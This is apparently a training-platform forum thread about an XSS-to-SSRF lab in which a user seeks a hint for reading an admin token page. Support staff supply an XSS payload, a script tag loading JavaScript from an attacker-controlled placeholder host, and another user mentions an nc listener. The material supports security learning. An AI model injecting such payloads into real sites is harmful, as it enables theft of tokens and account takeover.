Forum Discussion

Bronze I

2 years ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
2 years ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

ChrisKershaw

Community Support

2 years ago

Hey shubham

Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.

I'll be happy to share a hint to help you with your lab attempt:

In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

Will you see if this helps you with your attempt?

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Pen Test CTFs: Jinja2 Exploitation

Ep 7 Post Exploitation With Metasploit

Zeek Ep 4 Scripting

Help with Introduction to Python Scripting: Ep.7 – Demonstrate Your Skills

Recent Discussions

Immersive GUI

TLS Fundamentals: Ep.8 – Final Challenge

Elastic Data Ingest: Ep.5 – Packetbeat

Privilege Escalation: Windows – Unquoted Service Paths

Cyber Kill Chain: Delivery